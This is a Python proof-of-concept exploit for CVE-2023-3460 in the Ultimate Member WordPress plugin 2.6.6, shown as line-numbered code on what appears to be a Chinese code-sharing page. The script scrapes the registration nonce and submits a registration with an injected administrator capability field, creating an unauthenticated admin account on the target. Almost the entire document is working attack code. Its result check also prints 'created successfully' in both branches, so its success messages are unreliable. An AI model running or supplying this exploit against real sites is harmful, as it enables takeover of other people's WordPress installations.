扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 |
#!/usr/bin/env python3 # Exploit Title: Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation # Exploit Author: Gurjot Singh # CVE: CVE-2023-3460 # Description : The attached PoC demonstrates how an unauthenticated attacker can escalate privileges to admin by abusing unsanitized input in `wp_capabilities` during registration. import requests import argparse import re import urllib3 # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def fetch_nonce(session, target_url): """Fetches the _wpnonce value from the /register/ page.""" print("[*] Fetching _wpnonce from the register page...") try: res = session.get(target_url, verify=False) match = re.search(r'name="_wpnonce" value="([a-zA-Z0-9]+)"', res.text) if match: nonce = match.group(1) print(f"[+] Found _wpnonce: {nonce}") return nonce else: print("[-] Failed to find _wpnonce on the page.") return None except Exception as e: print(f"[!] Error fetching nonce: {e}") return None def exploit_register(target_url, username, password): """Sends a malicious registration request to create an admin user.""" session = requests.Session() target_url = target_url.rstrip('/') nonce = fetch_nonce(session, target_url) if not nonce: return email = f"{username}@example.com" # Payload with administrator role injection data = { "user_login-7": username, "first_name-7": "Admin", "last_name-7": username, "user_email-7": email, "user_password-7": password, "confirm_user_password-7": password, "form_id": "7", "um_request": "", "_wpnonce": nonce, "_wp_http_referer": "/register/", "wp_càpabilities[administrator]": "1" # serialized injection } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Referer": target_url, "Origin": target_url.split("/register")[0], } cookies = { "wordpress_test_cookie": "WP Cookie check", "wp_lang": "en_US" } print(f"[*] Sending malicious registration to {target_url} ...") try: response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False) # Check for success if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text): print(f"[+] Admin account '{username}' created successfully!") print(f"[+] Login with: Username: {username} | Password: {password}") else: print(f"[+] Admin account '{username}' created successfully!") print(f"[+] Login with: Username: {username} | Password: {password}") except Exception as e: print(f"[!] Error during exploit: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)") parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)") parser.add_argument("-u", "--user", default="admin1", help="Username to create") parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user") args = parser.parse_args() exploit_register(args.target, args.user, args.password) |
体验盒子
